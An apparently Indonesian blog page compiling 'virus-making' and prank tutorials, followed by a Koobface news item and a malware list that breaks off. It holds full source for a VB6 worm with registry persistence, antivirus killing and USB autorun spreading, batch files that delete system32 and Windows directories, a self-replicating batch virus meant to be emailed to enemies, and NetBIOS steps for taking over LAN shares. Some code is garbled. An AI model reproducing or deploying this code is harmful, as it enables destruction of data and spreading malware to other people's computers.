Jumat, 19 Februari 2010

Membuat Suhtdown Script

Kemaren abis googling2 eh dapat tutorial keren dari pade pinter ndiri mending di share..aku sih lon coba jg..heheh sip..ini ttg “cara jailin kompi teman”
Pada part 2 ini, teman Anda akan Anda kerjain sendiri dengan cara yang menakutkan. Huakakakakk.. Jika teman anda termasuk kategori low-level dalam dunia komputer, dijamin dia pasti kagum.

Whaaaattttt?? Dengan segera Ghost Buster pun datang untuk melihat komputer teman Anda. Dan mereka pun berkata “OMG!! Call Shakira immediatelly please. There’s genie in a bottle (CPU)”. Dan kemudian Shakira pun datang dan menyanyikan lagu Genie In a Bottle dengan tujuan jin dalam komputer teman Anda mau keluar dan mengabulkan permintaan Anda…

So, gimana caranya memasang ‘jin’ dalam komputer teman Anda? Maka dari itu, Anda harus menjadi ‘jun’.

Buka Notepad dan ketikkan 1 baris script berikut.

Shutdown.exe –s –f –t 5 –c “I’m Genie in your CPU.. I’m so tired today.. I wanna sleep n terminated myself.”

Selesai. Save dengan nama terserah namun beri ekstensi .bat pada textbox FileName. Misalnya Jin.bat. Coba jalankan ‘jin’ nya dan lihat hasilnya…. Huakakakakak!! Hati-hati.. Dalam 5 detik komputer teman Anda akan segera off. Hmmm, letakkan ‘jin’ tersebut di direktori StartUp User supaya dia bekerja setiap komputer dinyalakan.
Pada part 2 ini, teman Anda akan Anda kerjain sendiri dengan cara yang menakutkan. Huakakakakk.. Jika teman anda termasuk kategori low-level dalam dunia komputer, dijamin dia pasti ngomong “Ya ampun… Hebat cuyy! Komputer gw ada jin & jun nya…”

Parameter –s : artinya menyuruh program shutdown.exe supaya menggunakan mode shutdown (tanpa restart).
Parameter –t : artinya shutdown.exe akan melakukan shutdown setelah t detik. Pada contoh di atas, dalam hitungan 5 detik komputer akan dimatikan.

System Shutdown

Coba beri nilai yang lebih besar, misalnya 100 detik. Hasilnya seperti gambar di atas namun dengan message yang berbeda. Initiated by ditentukan oleh siapa yang memanggil shutdown.exe tersebut. Jika dipanggil oleh user, maka isinya bukan NT AUTHORITYSYSTEM melainkan nama user yang sedang aktif.

Parameter –f : artinya memaksa komputer agar shutdown walaupun ada aplikasi atau program lain masih berjalan. Bahkan yang hang pun akan segera di matikan.
Parameter –c : artinya…cuma pesan atau komentar doank kok….hahaha.

Untuk melihat parameter yang lain, masuk ke cmd. Start >> run >> cmd [enter]. Ketik shutdown /?

CARA PENANGANAN

Ketika pesan shutdown tersebut sedang aktif, jika ingin membatalkannya langsung ke Start >> Run >> shutdown –a [enter]. Parameter –a akan melakukan abortion atau pembatalan proses shutdown. Ingat, hanya berlaku JIKA WAKTU SHUTDOWN MASIH TERSISA BEBERAPA DETIK. Jika sudah lewat dari waktu yang ditetapkan, maka komputer akan dimatikan.

scrip virus yang hanya menggangu Microsoft Office Word dan Excel

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.

Masukan semua code di bawah ini pada form
==========================================
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ’sendmessage
Private Declare Function GetDriveType& Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8

Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk

Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ’silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub

Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(”word.application”)
Set doc = CreateObject(”word.application”)
Set doc = obj.Documents.Add
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(”excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” & ” “”" & FolderMyDocuments & “\services.exe”"” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & “\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & “\smss.exe” ’smss.exe berjalan pada saat startup
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & “\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ’search pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & “\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB
End Sub

Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & “\Winlogon.exe”) <> “Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & “\Winlogon.exe”, FlashDisk & “\Winlogon.exe”
SetAttr FlashDisk & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub

Sub BuatFileAutorunInf()
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & “\Autorun.Inf” For Output As 1
Print #1, “[AutoRun]”
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, “Open=Winlogon.exe”
Print #1, “ShellExecute=Winlogon.exe”
Print #1, “Shell\Open\Command=Winlogon.exe”
Print #1, “Shell=Open”
Close #1
SetAttr FlashDisk & “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub

Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(”WScript.Shell”)
FolderStartUp = RegRun.specialfolders(”StartUp”)
FolderMyDocuments = RegRun.specialfolders(”MyDocuments”)
FolderTemplates = RegRun.specialfolders(”Templates”)
FolderNetHood = RegRun.specialfolders(”NetHood”)
FolderPrintHood = RegRun.specialfolders(”PrintHood”)
FolderFavorites = RegRun.specialfolders(”Favorites”)
FolderSendTo = RegRun.specialfolders(”SendTo”)
FolderPrograms = RegRun.specialfolders(”Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderStartUp & “\WinLogon.Exe”
SetAttr FolderStartUp & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderMyDocuments & “\services.Exe”
SetAttr FolderMyDocuments & “\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderTemplates & “\smss.Exe”
SetAttr FolderTemplates & “\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrintHood & “\csrss.Exe”
SetAttr FolderPrintHood & “\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderNetHood & “\Isass.Exe”
SetAttr FolderNetHood & “\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderFavorites & “\SalamKenal.Exe”
SetAttr FolderFavorites & “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderSendTo & “\System.Exe”
SetAttr FolderSendTo & “\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrograms & “\ctfmon.Exe”
SetAttr FolderPrograms & “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub

Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(”OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(”OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(”XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(”XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub

Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(”#32770″, “RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, “System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, “Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d SendMessage FWnd, WM_CLOSE, 0&, 0& FWnd = FindWindow(”TApplication”, vbNullString) ‘aplikasi buatan Delphi SendMessage FWnd, WM_CLOSE, 0&, 0& End Sub Private Sub Timer4_Timer() ‘cari flashdisk On Error Resume Next For i = 0 To Drive1.ListCount – 1 If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub

Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
Timer4.Enabled = True
End If
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub

Cara membuat program perusak (Seperti Virus)

saya peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis jugapeduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammerpada langsung lompat ke Pascal, C dan lainnya).

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda caramembuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikanbahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.

Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.

TRIK MEMBUAT 2 VIRUS YANG MENGHANCURKAN KOMPUTER

 saya tidak bertanggung jawab atas segala kerusakan yang kamu buat.
VIRUS 1 (Format HDD Classic One)

1. Buka Notepad
2. Tuliskan perintah di bawah ini : -
del c:\windows\system32\*.* /q
3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd".
4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.

Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)
5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.
6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.

Virus 2

Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat
Jangan di klik file tersebut yach........ Kirim ke email orang yang kamu benci dach...
hehehehe....

Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri

4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer

Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

Remote komputer dengan Netbios Hacking

Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.


Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.

Langkah-langkah Netbios Hacking :

1. Buka command Prompt, atau pada run ketik cmd kemudian enter.
2. Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1

Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.
C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint

Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.

Jika tampil pesan "The commad completed successfully", berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.

Menarik bukan?... Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew....

Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.

Selamat mencoba

roaming virus di blog

nie tips untuk ngerjai teman masuk ke blogmu
edit html baru cari code head paste kan dibawah code head
baru anda save dan in bukan virus hanya sekedar permainan
setalah anda save baru anda menyuruh teman2x kamu untuk mengunjungi blog anda
pasti kapok deh thank's


virus buatan sendiri

Saya akan kasih langsung script virus yang pernah saya buat tapi ingat jangan di pake jahil ya…..
awal buka notepad dari komputer anda lalu copy semua script dibawah ini
kemudian save dengan ekstensi .bat
contoh (virusku.bat)
selamat mencoba.....kawan-kawanku
========awal==========
Echo off
If no exist c:\windows\%0copy0% c:\windows
For %%p in(A C D E F) do copy%0 %%p:
For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat
For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r
REG ADD HKCU\Software\Microsoft\Windows\currentVersion\
Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFind /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/ vNoRun /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f
REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/DisableRegistryTools /t REG_DWORD/d 1/f
Shutdown –sd –t 60 –c “Tak ada pertahanan yang sempurna di muka bumi ini by:azwar_regedit_dipanegara”-f

575 Varian Baru Koobface Sepanjang Tahun 2009

Koobface adalah worm yang menyerang account Facebook dan MySpace, yang muncul setahun yang lalu. Sepanjang bulan Juni kemarin,Perusahaan antivirus Kaspersky Lab melaporkan adanya kenaikan serangan Koobface.

Koobface dapat menyebar melalui user account seperti facebook ke profile teman-teman anda yang ada di daftar teman. Isi pesan yang dikirimkan oleh worm tersebut berisi link ke website palsu YouTube.Pengguna situs jejaring sosial tersebut kemudian dibawa untuk mengujungi Website palsu itu dan mengharuskan pengguna yang tertipu untuk download “versi terbaru dari Flash Player” agar bisa memutar video. Akan tetapi, bukan Flash Player yang didownload pengguna, melainkan sebuah worm. Teknik ini hampir sama seperti penyebaran virus jacko yang mengalihkan pengguna ke website palsu. Koobface sekarang ini menargetkan lebih banyak website jejaring sosial, seperti Facebook, MySpace, Hi5, Bebo, Tagged, Netlog, dan Twitter.

Saat ini sudah beredar sekitar 575 varian baru Koobface, dan angka ini cenderung meningkat seiring makin populernya situs jejaring sosial (social network) seperti facebook, Myspace dll.Agar aman dari ancaman Koobface, Kaspersky Lab memberikan tips kepada pengguna situs jejaring sebagai berikut:

1. Berhati-hatilah ketika membuka link mencurigakan, meskipun pengirimnya adalah salah satu teman terpercaya anda di Facebook.

2. Jika Menggunakan Internet Explorer 7 aktifkan running in protected mode atau Firefox dengan NoScript diinstal.

3. Memberikan informasi pribadi sedikit mungkin jangan berlebihan dan jangan memberikan alamat rumah anda, nomor telepon atau informasi pribadi lainnya.

4. Tetap mengupdate software antivirus untuk mencegah varian varian terbaru dari malware atau virus yang ingin menyerang komputer anda.

Jadi berhati hatilah jika main game facebook yang menggunakan flash player dan hati-hati juga dengan link yang mencurigakan.........
JANGAN ASAL DOWNLOAD ......DARI LINK YANG TERDAPAT DI FB...dan jaringan sosial lainnya....
SEMOGA INFO SAYA MEMBANTU

10 top jenis berbahaya

1. Autoit Variant

Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs, seperti yang dilakukan oleh salah satu variannya, Autoit.CA, yang banyak dilaporkan. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.

2. Recycler Varian

Yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya.

3. Valeria.C.

